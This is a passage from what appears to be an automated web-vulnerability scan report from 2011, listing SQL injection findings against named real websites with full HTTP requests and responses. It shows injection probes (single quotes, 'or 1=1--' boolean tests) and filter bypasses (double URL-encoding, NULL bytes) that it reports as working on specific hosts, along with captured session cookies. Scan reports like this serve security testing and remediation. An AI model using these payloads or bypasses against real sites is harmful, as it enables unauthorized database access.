28.37. http://www.butlerrubin.com/web/br.nsf/tableback.jpg

28.38. http://www.conferenceservers.com/browser/proxy.asp

28.39. http://www.digiware.net/templates/home/favicon.ico

28.40. http://www.digiware.net/templates/intena1/favicon.ico

28.41. http://www.dmoc.com/favicon.ico

28.42. http://www.elawmarketing.com/favicon.ico

28.43. http://www.facebook.com/extern/login_status.php

28.44. http://www.foxbusiness.com/authentication/logout/submit

28.45. http://www.foxbusiness.com/static/all/generated/js/fb2-breaking-news.js

28.46. http://www.foxbusiness.com/static/all/img/global/logo-disqus-1.gif

28.47. http://www.google.com/search

28.48. http://www.hbsr.com/favicon.ico

28.49. http://www.korteco.com/sites/all/themes/korteco/favicon.ico

28.50. http://www.mimecast.com/Global/HeaderTitleVideos/Images/SecurityV4.png

28.51. http://www.moritthock.com/index.php

28.52. http://www.nytimes.com/adx/bin/adx_remote.html

28.53. http://www.privateequityinfo.com/favicon.ico

28.54. http://www.privateequityinfo.com/grfx/grfx2009/topmenu/shadow.jpg

28.55. http://www.tuckerellis.com/tucker-favicon.ico

28.56. https://www.usaa.com/favicon.ico

28.57. https://www.wellsfargo.com/img/theprivatebank/apa.jpg

28.58. http://www.wolfgreenfield.com/favicon.ico

28.59. http://www.wolfgreenfield.com/javascript/c_smartmenus.js

29. Content type is not specified

29.1. http://ad.yieldmanager.com/st

29.2. http://lfov.net/webrecorder/g/chimera.js

29.3. http://lfov.net/webrecorder/js/listen.js

29.4. https://webmail-us.mimecast.com/favicon.ico

30. SSL certificate



1. SQL injection
There are 9 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://da.newstogram.com/hg.php [DMUserTrack cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The DMUserTrack cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the DMUserTrack cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7'

Response 1

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:46 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7%27; expires=Fri, 11-May-2012 11:37:46 GMT; domain=.newstogram.com
Content-Length: 123

Newstogram.completed({"Histogram":{"status":"error","uid":"896A200B-7889-4691-9DB7-6D96659E63C7'","ip":"173.193.214.243"}})

Request 2

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7''

Response 2

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:46 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7%27%27; expires=Fri, 11-May-2012 11:37:46 GMT; domain=.newstogram.com
Content-Length: 124

Newstogram.completed({"Histogram":{"status":"saved","uid":"896A200B-7889-4691-9DB7-6D96659E63C7''","ip":"173.193.214.243"}})

1.2. http://googleads.g.doubleclick.net/pagead/ads [bpp parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The bpp parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the bpp parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the bpp request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-nytimes_display_html&format=728x90_pas_abgc&output=html&h=90&w=728&lmt=1305216969&channel=Topics_leaderboard&ad_type=image&alternate_ad_url=http%3A%2F%2Fwww.nytimes.com%2Fads%2Fremnant%2Fnetworkredirect-leaderboard.html&oe=utf8&flash=10.2.154&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Fsubjects%2Fp%2Fprivate_equity%2Findex.html%3Finline%3Dnyt-classifier&adsafe=high&targeting=site_content&dt=1305198969022&bpp=2%2527&shv=r20110427&jsv=r20110427&correlator=1305198969026&frm=0&adk=2225227735&ga_vid=1802707015.1305198969&ga_sid=1305198969&ga_hid=556056449&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&fu=0&ifi=1&dtd=114&xpc=gLROVOgUps&p=http%3A//topics.nytimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 11:19:45 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2728

<html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstiming={Timer:a,load:g}
...[SNIP]...
"?v=3","&s="+(window.jstiming.sn||"pagead")+"&action=",b.name,j.length?"&it="+j.join(","):"","",f,"&rt=",m.join(",")].join("");a=new Image;var o=window.jstiming.c++;window.jstiming.a[o]=a;a.onload=a.onerror=function(){delete window.jstiming.a[o]};a.src=b;a=null;return b}};var i=window.jstiming.load;function l(b,a){var e=parseInt(b,10);if(e>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-nytimes_display_html&format=728x90_pas_abgc&output=html&h=90&w=728&lmt=1305216969&channel=Topics_leaderboard&ad_type=image&alternate_ad_url=http%3A%2F%2Fwww.nytimes.com%2Fads%2Fremnant%2Fnetworkredirect-leaderboard.html&oe=utf8&flash=10.2.154&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Fsubjects%2Fp%2Fprivate_equity%2Findex.html%3Finline%3Dnyt-classifier&adsafe=high&targeting=site_content&dt=1305198969022&bpp=2%2527%2527&shv=r20110427&jsv=r20110427&correlator=1305198969026&frm=0&adk=2225227735&ga_vid=1802707015.1305198969&ga_sid=1305198969&ga_hid=556056449&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&fu=0&ifi=1&dtd=114&xpc=gLROVOgUps&p=http%3A//topics.nytimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 11:19:46 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1496

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><IFRAME SRC="http://ad.doubleclick.net/adi/N4848.150143.2069808252521/B5487153;sz=728x90;click=http://googleads.g
...[SNIP]...

1.3. http://p.addthis.com/pixel [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://p.addthis.com
Path:   /pixel

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pixel?pixelID=57148&partnerID=115&key=segment HTTP/1.1
Host: p.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527
Cookie: uid=4dc048d9159e4ae3; psc=0; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.1FE|1304431085.1OD|1304431085.60; uit=1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html
Connection: close
X-Error-Code: 503
Content-Length: 0


Request 2

GET /pixel?pixelID=57148&partnerID=115&key=segment HTTP/1.1
Host: p.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Cookie: uid=4dc048d9159e4ae3; psc=0; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.1FE|1304431085.1OD|1304431085.60; uit=1

Response 2

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:45:07 GMT
Location: http://va.px.invitemedia.com/pixel?key=segment&pixelID=57148&partner_uid=&partnerID=115
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


1.4. http://p.addthis.com/pixel [uid cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://p.addthis.com
Path:   /pixel

Issue detail

The uid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the uid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pixel?pixelID=57148&partnerID=115&key=segment HTTP/1.1
Host: p.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3%00'; psc=0; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.1FE|1304431085.1OD|1304431085.60; uit=1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html
Connection: close
X-Error-Code: 503
Content-Length: 0


Request 2

GET /pixel?pixelID=57148&partnerID=115&key=segment HTTP/1.1
Host: p.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3%00''; psc=0; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.1FE|1304431085.1OD|1304431085.60; uit=1

Response 2

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:49:38 GMT
Location: http://va.px.invitemedia.com/pixel?key=segment&pixelID=57148&partner_uid=&partnerID=115
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


1.5. http://www.pomerantzlaw.com/attorneys.html [attorneyID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pomerantzlaw.com
Path:   /attorneys.html

Issue detail

The attorneyID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attorneyID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /attorneys.html?action=attorneyDetail&attorneyID=24' HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/attorneys.html
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmb=182215078.3.10.1305200941; __utmc=182215078; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 11:49:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23344
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Unclosed quotation mark before the character string '24' <br />
...[SNIP]...

1.6. http://www.pomerantzlaw.com/cases.html [CaseID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pomerantzlaw.com
Path:   /cases.html

Issue detail

The CaseID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CaseID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /cases.html?action=caseDetail&CaseID=102' HTTP/1.1
Host: www.pomerantzlaw.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 11:40:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23366
Set-Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:25 GMT
Set-Cookie: CFTOKEN=0; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:25 GMT
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Unclosed quotation mark before the character string '102' <br />
...[SNIP]...

1.7. http://www.tuckerellis.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.tuckerellis.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 17622879%20or%201%3d1--%20 and 17622879%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?117622879%20or%201%3d1--%20=1 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Tucker+Ellis+%26+West&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 12 May 2011 12:21:42 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Content-Length: 5043
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
   <head>
       <title>Apache HTTP Server Test Page powered by CentOS</title>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
       <style type="text/css">
           body {
               background-color: #fff;
               color: #000;
               font-size: 0.9em;
               font-family: sans-serif,helvetica;
               margin: 0;
               padding: 0;
           }
           :link {
               color: #0000FF;
           }
           :visited {
               color: #0000FF;
           }
           a:hover {
               color: #3399FF;
           }
           h1 {
               text-align: center;
               margin: 0;
               padding: 0.6em 2em 0.4em;
               background-color: #3399FF;
               color: #ffffff;
               font-weight: normal;
               font-size: 1.75em;
               border-bottom: 2px solid #000;
           }
           h1 strong {
               font-weight: bold;
           }
           h2 {
               font-size: 1.1em;
               font-weight: bold;
           }
           .content {
               padding: 1em 5em;
           }
           .content-columns {
               /* Setting relative positioning allows for
               absolute positioning for sub-classes */
               position: relative;
               padding-top: 1em;
           }
           .content-column-left {
               /* Value for IE/Win; will be overwritten for other browsers */
               width: 47%;
               padding-right: 3%;
               float: left;
               padding-bottom: 2em;
           }
           .content-column-right {
               /* Values for IE/Win; will be overwritten for other browsers */
               width: 47%;
               padding-left: 3%;
               float: left;
               padding-bottom: 2em;
           }
           .content-columns>.content-column-left, .content-columns>.content-column-right {
               /* Non-IE/Win */
           }
           img {
               border: 2px solid #fff;
               padding: 2px;
               margin: 2px;
           }
           a:hover img {
               border: 2px solid #3399FF;
           }
       </style>
   </head>

   <body>
   <h1>Apache 2 Test Page<br><font size="-1"><strong>powered by</font> CentOS</strong></h1>

       <div class="content">
           <div class=
...[SNIP]...

Request 2

GET /?117622879%20or%201%3d2--%20=1 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Tucker+Ellis+%26+West&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Tue, 03 Jul 2001 06:00:00 GMT
Last-Modified: Thu, 12 May 2011 12:21:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Tucker Ellis &amp; West LLP</title>
<meta name="description" content="Tucker Ellis &amp; West LLP is an Ohio based law firm specializing in Business Litigation, Mass Tort, and Product Liability."></meta>
<link rel="stylesheet" type="text/css" href="css/home.css" />
<link rel="shortcut icon" href="tucker-favicon.ico" />
<script type="text/javascript" src="javascript/functions.js"></script>
</head>

<body onload="MM_preloadImages('images/over/Untitled-1-copy_01.jpg','images/over/Untitled-1-copy_02.jpg','images/over/Untitled-1-copy_03.jpg','images/over/Untitled-1-copy_04.jpg','images/over/Untitled-1-copy_05.jpg','images/over/Untitled-1-copy_06.jpg','images/over/Untitled-1-copy_07.jpg','images/over/Untitled-1-copy_13.jpg','images/over/Untitled-1-copy_14.jpg','images/over/Untitled-1-copy_10.jpg','images/over/Untitled-1-copy_16.jpg','images/over/Untitled-1-copy_09.jpg','images/over/Untitled-1-copy_12.jpg','images/over/Untitled-1-copy_17.jpg')">

<div id="wrapper">

<div id="container">

<div id="mast_head">

<div id="home_logo">
<img src="images/logo.gif" alt="Tucker Ellis &amp; West" width="367" height="50" id="logo" border="0" title="Tucker Ellis &amp; West" />
</div>

<div id="phrase">
&nbsp;
</div>
</div>

</div>

<div style="clear:both"></div>


<div id="navigation">
<ul id="nav_main">
<li id="nm_1"
...[SNIP]...

1.8. http://www.tuckerellis.com/tucker-favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.tuckerellis.com
Path:   /tucker-favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 10924747'%20or%201%3d1--%20 and 10924747'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /tucker-favicon.ico10924747'%20or%201%3d1--%20 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 12 May 2011 12:21:47 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /tucker-favicon.ico10924747' or 1=1--
on this server.</p>
<hr>
<address>Apache/2.2.3 (CentOS) Server at www.tuckerellis.com Port 80</address>
</body></html>

Request 2

GET /tucker-favicon.ico10924747'%20or%201%3d2--%20 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
